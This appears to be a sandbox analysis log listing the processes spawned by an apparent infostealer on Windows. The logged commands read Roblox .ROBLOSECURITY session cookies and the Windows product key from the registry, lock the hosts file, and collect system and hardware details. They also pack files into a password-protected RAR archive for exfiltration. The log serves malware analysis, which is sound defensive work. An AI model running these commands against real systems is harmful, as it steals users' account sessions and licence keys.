                                                                                                                                                                                                                            Target ID:85
                                                                                                                                                                                                                            Start time:02:38:17
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                                                                                                                                                                                            Imagebase:0x7ff772ad0000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:86
                                                                                                                                                                                                                            Start time:02:38:17
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\attrib.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:attrib +r C:\Windows\System32\drivers\etc\hosts
                                                                                                                                                                                                                            Imagebase:0x7ff7451f0000
                                                                                                                                                                                                                            File size:23'040 bytes
                                                                                                                                                                                                                            MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:87
                                                                                                                                                                                                                            Start time:02:38:17
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff68cce0000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:88
                                                                                                                                                                                                                            Start time:02:38:17
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                                                                                                                                                            Imagebase:0x7ff6eb350000
                                                                                                                                                                                                                            File size:452'608 bytes
                                                                                                                                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:89
                                                                                                                                                                                                                            Start time:02:38:17
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                                                                                                                            Imagebase:0x7ff772ad0000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:90
                                                                                                                                                                                                                            Start time:02:38:17
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff68cce0000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:91
                                                                                                                                                                                                                            Start time:02:38:18
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:tasklist /FO LIST
                                                                                                                                                                                                                            Imagebase:0x7ff7e2d20000
                                                                                                                                                                                                                            File size:106'496 bytes
                                                                                                                                                                                                                            MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:92
                                                                                                                                                                                                                            Start time:02:38:18
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                                                                            Imagebase:0x7ff772ad0000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:93
                                                                                                                                                                                                                            Start time:02:38:18
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff68cce0000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:94
                                                                                                                                                                                                                            Start time:02:38:18
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\tree.com
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:tree /A /F
                                                                                                                                                                                                                            Imagebase:0x7ff6a1c50000
                                                                                                                                                                                                                            File size:20'992 bytes
                                                                                                                                                                                                                            MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:95
                                                                                                                                                                                                                            Start time:02:38:18
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                                                                            Imagebase:0x7ff772ad0000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:96
                                                                                                                                                                                                                            Start time:02:38:18
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff68cce0000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:97
                                                                                                                                                                                                                            Start time:02:38:19
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\tree.com
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:tree /A /F
                                                                                                                                                                                                                            Imagebase:0x7ff6a1c50000
                                                                                                                                                                                                                            File size:20'992 bytes
                                                                                                                                                                                                                            MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:98
                                                                                                                                                                                                                            Start time:02:38:19
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                                                                                                                                                                                            Imagebase:0x7ff772ad0000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:99
                                                                                                                                                                                                                            Start time:02:38:19
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff68cce0000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:100
                                                                                                                                                                                                                            Start time:02:38:19
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                                                                                                                                                            Imagebase:0x7ff6eb350000
                                                                                                                                                                                                                            File size:452'608 bytes
                                                                                                                                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:101
                                                                                                                                                                                                                            Start time:02:38:27
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exe a -r -hp"Logger1@12345" "C:\Users\user\AppData\Local\Temp\7VKXZ.zip" *"
                                                                                                                                                                                                                            Imagebase:0x7ff772ad0000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:102
                                                                                                                                                                                                                            Start time:02:38:27
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff68cce0000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:103
                                                                                                                                                                                                                            Start time:02:38:27
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exe a -r -hp"Logger1@12345" "C:\Users\user\AppData\Local\Temp\7VKXZ.zip" *
                                                                                                                                                                                                                            Imagebase:0x7ff6256b0000
                                                                                                                                                                                                                            File size:630'736 bytes
                                                                                                                                                                                                                            MD5 hash:9C223575AE5B9544BC3D69AC6364F75E
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                                                            • Detection: 0%, ReversingLabs
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:104
                                                                                                                                                                                                                            Start time:02:38:28
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                                                                                                                                                                                                            Imagebase:0x7ff772ad0000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:105
                                                                                                                                                                                                                            Start time:02:38:28
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff68cce0000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:106
                                                                                                                                                                                                                            Start time:02:38:28
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:wmic os get Caption
                                                                                                                                                                                                                            Imagebase:0x7ff7a81b0000
                                                                                                                                                                                                                            File size:576'000 bytes
                                                                                                                                                                                                                            MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:107
                                                                                                                                                                                                                            Start time:02:38:29
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
                                                                                                                                                                                                                            Imagebase:0x7ff772ad0000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:108
                                                                                                                                                                                                                            Start time:02:38:29
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff68cce0000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:109
                                                                                                                                                                                                                            Start time:02:38:29
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:wmic computersystem get totalphysicalmemory
                                                                                                                                                                                                                            Imagebase:0x7ff7a81b0000
                                                                                                                                                                                                                            File size:576'000 bytes
                                                                                                                                                                                                                            MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:110
                                                                                                                                                                                                                            Start time:02:38:30
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                                                                                                                                                                                            Imagebase:0x7ff772ad0000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:111
                                                                                                                                                                                                                            Start time:02:38:30
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff68cce0000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:112
                                                                                                                                                                                                                            Start time:02:38:30
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:wmic csproduct get uuid
                                                                                                                                                                                                                            Imagebase:0x7ff7a81b0000
                                                                                                                                                                                                                            File size:576'000 bytes
                                                                                                                                                                                                                            MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:113
                                                                                                                                                                                                                            Start time:02:38:31
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
                                                                                                                                                                                                                            Imagebase:0x7ff772ad0000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:114
                                                                                                                                                                                                                            Start time:02:38:31
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff68cce0000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:115
                                                                                                                                                                                                                            Start time:02:38:31
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                                                                                                                                                                                            Imagebase:0x7ff6eb350000
                                                                                                                                                                                                                            File size:452'608 bytes
                                                                                                                                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:116
                                                                                                                                                                                                                            Start time:02:38:32
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                                                                                                                                                                                            Imagebase:0x7ff772ad0000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:117
                                                                                                                                                                                                                            Start time:02:38:32
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff68cce0000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:118
                                                                                                                                                                                                                            Start time:02:38:32
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:wmic path win32_VideoController get name
                                                                                                                                                                                                                            Imagebase:0x7ff7a81b0000
                                                                                                                                                                                                                            File size:576'000 bytes
                                                                                                                                                                                                                            MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:119
                                                                                                                                                                                                                            Start time:02:38:33
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
                                                                                                                                                                                                                            Imagebase:0x7ff772ad0000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:120
                                                                                                                                                                                                                            Start time:02:38:33
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff68cce0000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:121
                                                                                                                                                                                                                            Start time:02:38:33
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
                                                                                                                                                                                                                            Imagebase:0x7ff6eb350000
                                                                                                                                                                                                                            File size:452'608 bytes
                                                                                                                                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:122
                                                                                                                                                                                                                            Start time:02:38:53
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:"C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                                                                                                                                                                                                                            Imagebase:0x7ff750e60000
                                                                                                                                                                                                                            File size:468'120 bytes
                                                                                                                                                                                                                            MD5 hash:B3676839B2EE96983F9ED735CD044159
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:false
